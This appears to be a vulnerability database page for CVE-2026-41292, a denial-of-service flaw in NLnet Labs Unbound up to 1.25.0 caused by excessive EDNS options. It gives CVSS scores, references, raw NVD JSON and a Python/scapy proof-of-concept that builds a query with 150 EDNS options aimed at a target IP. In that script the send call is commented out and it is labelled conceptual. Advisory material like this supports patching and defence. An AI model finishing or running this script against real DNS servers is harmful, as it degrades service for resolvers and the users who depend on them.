CVE-2026-41292

Description

NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to a degradation of service attack related to parsing long lists of incoming EDNS options. An adversary sending queries with too many EDNS options can hold Unbound threads hostage while they are parsing and creating internal data structures for the options. Coordinated attacks can result in degradation and/or denial of service. Unbound 1.25.1 contains a patch with a fix to limit acceptable incoming EDNS options (100).

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nlnetlabs:unbound:*:*:*:*:*:*:*:* - VULNERABLE

NLnet Labs Unbound <= 1.25.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys
from scapy.all import IP, UDP, DNS, DNSQR, EDNS0

def send_exploit(target_ip):
    # Construct a base DNS query
    dns_query = DNS(rd=1, qd=DNSQR(qname="example.com"))
    
    # Add a large number of EDNS0 options to trigger the vulnerability
    # Unbound <= 1.25.0 does not limit this effectively, causing DoS
    options = []
    for i in range(150):  # Sending more than the fixed limit (100)
        options.append(EDNS0(opt_code=0x000A, opt_data=b"A" * 10))
    
    dns_query[DNS].arcount = len(options)
    # Note: Scapy EDNS0 implementation might need specific handling for RDATA
    # This is a conceptual PoC demonstrating the payload structure.
    # In a real exploit, raw bytes might be crafted to ensure the options count is high.
    
    packet = IP(dst=target_ip)/UDP(dport=53)/dns_query
    
    print(f"[+] Sending malicious packet to {target_ip} with {len(options)} EDNS options...")
    # send(packet)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <target_ip>")
    else:
        send_exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41292
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41292
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41292/
[4] VulDB https://vuldb.com/cve/CVE-2026-41292
[5] https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-41292.txt

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41292", "sourceIdentifier": "[email protected]", "published": "2026-05-20T10:16:27.327", "lastModified": "2026-05-20T22:49:46.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to a degradation of service attack related to parsing long lists of incoming EDNS options. An adversary sending queries with too many EDNS options can hold Unbound threads hostage while they are parsing and creating internal data structures for the options. Coordinated attacks can result in degradation and/or denial of service. Unbound 1.25.1 contains a patch with a fix to limit acceptable incoming EDNS options (100)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Red", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-407"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nlnetlabs:unbound:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.25.1", "matchCriteriaId": "45EC9AEF-23EC-4ECC-A769-18DF07B2CAEC"}]}]}], "references": [{"url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-41292.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}